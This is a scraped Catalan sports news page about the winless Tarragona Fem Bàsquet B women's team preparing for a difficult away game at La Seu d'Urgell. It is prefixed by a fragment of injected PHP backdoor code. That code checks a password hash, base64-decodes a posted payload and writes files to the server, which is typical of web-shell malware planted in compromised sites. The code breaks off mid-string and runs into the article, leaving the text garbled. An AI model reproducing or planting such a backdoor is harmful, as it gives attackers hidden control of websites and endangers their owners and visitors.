function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El llarg viatge cap al triomf del Tarragona Fem Bàsquet B (La Seu d'Urgell, 17.30 h) - Tgn Bàsquet Club -

El llarg viatge cap al triomf del Tarragona Fem Bàsquet B (La Seu d’Urgell, 17.30 h)

By
Updated: novembre 6, 2015

El Tarragona Fem Bàsquet B ha fet teràpia de grup aquesta setmana per intentar canviar el seu rumb al grup 2 de Primera Catalana. L’equip lila ha perdut els 6 partits que ha disputat i la seva imatge, sobretot, en els últims enfrontaments, no ha estat la desitjada. Les baixes per lesió han tingut molt a veure, però jugadores i cos tècnic van decidir a començaments de setmana fer una profunda reflexió de per què la cosa no rutlla i ara ja s’ha posat fil a l’agulla. El primer test post divan és contra un rival, però, difícil. Complicat per moltes coses. Primer de tot, es tracta d’un desplaçament llarg, a la Seu d’Urgell, i, en segon lloc, el Sedis és un dels equips de la part alta de la classificació (cinquè classificat amb un balanç de 4 victòries i 2 derrotes). Aconseguir el primer triomf demà (17.30 h) no serà, doncs, senzill. I més si tenim en compte que Sergi Farré continua amb la manca d’efectius. Un d’important és Anna Pocino. La pivot, lesionada, es troba en la fase final de la recuperació i, si juga, ho farà amb el primer equip de Copa Catalunya a l’Hospitalet. L’altra pivot gran, Zerouali, tampoc jugarà, ni tampoc Piñol i Sandra Pascual arrossega una petita lesió muscular. I Irene Villegas té molèsties al quàdriceps. Ase magre, carregat de mosques.

Amb aquest panorama, el Tarragona Fem Bàsquet B intentarà estrenar l’apartat de victòries. “Estic orgullós de l’actitud de les jugadores i de la seva predisposició a millorar”, diu Sergi Farré. El tècnic assegura que els entrenaments després de la reunió amb les jugadores han estat de primer nivell i espera poder competir amb més força que mai a partir d’ara.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *